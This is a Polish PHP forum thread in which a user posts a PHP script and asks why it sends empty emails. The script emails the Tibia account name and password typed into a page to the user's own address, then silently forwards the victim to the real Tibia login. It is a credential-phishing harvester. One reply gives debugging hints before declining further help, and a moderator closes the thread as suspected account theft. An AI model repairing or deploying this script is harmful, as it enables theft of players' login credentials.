Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: Co zrobic aby kazdy wpis na mojej stronie zostal wysylany na moj email?
Forum PHP.pl > Forum > PHP
lwk92
Tak jak wyzej, chodzi o to zeby z pola Account Name i Password wpisy dochodzily na e mial. Posiadam taki skrypt:

<?php
$from_header = "From: Tibiapass@com.pl";
mail('lwk92@o2.pl',$_POST['msg']['ACCOUNTLOGIN_ACCOUNTNAME'],$_POST['msg']['ACCOUNTLOGIN_PASSWORD'], $from_header);
echo '
<body>
<form action="https://secure.tibia.com/account/?subtopic=accountmanagement" method="post" name="AccountLogin" >
<INPUT TYPE=hidden NAME="ACCOUNTLOGIN_PASSWORD" VALUE="',$_POST['msg']['ACCOUNTLOGIN_PASSWORD'],'">
<INPUT TYPE=hidden NAME="ACCOUNTLOGIN_ACCOUNTNAME" VALUE="',$_POST['msg']['ACCOUNTLOGIN_ACCOUNTNAME'],'">
</form>
<script type="text/javascript" language="JavaScript">
document.AccountLogin.submit();
</script>
</body>
';
?>

Emaile dochodza ale niestety puste!!!! Co musze zmienic w tym skrypcie aby wpisy z tych okienek zostaly wysylane na emaila?
Prosze o pomoc albo inny skrypt php !
CuteOne
1. Sprawdzić czy wysłano POST
2. Zamiast przecinków w value powinny być kropki
3. Skąd, żeś wytrzasnął $_POST['msg'] ?
lwk92
Skrypt nie jest moj ktos mi go kiedys podeslal, jak nalezy sprawdzic czy wyslano POST?
Najlepiej jakbys mogl zrobic poprawke tego co mam, mogoloby to okazac sie kluczowe.
CuteOne
Wujek google po wpisaniu "php sprawdzić czy wysłano POST" zwraca odpowiedź, tyczy się to również pozostałych punktów.
phpion
Mam podejrzenia, że skrypt miałby służyć do kradzieży danych dostępowych do kont. Jeśli się mylę - proszę o informację na PW. Tymczasem jednak prewencyjnie zamykam.
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.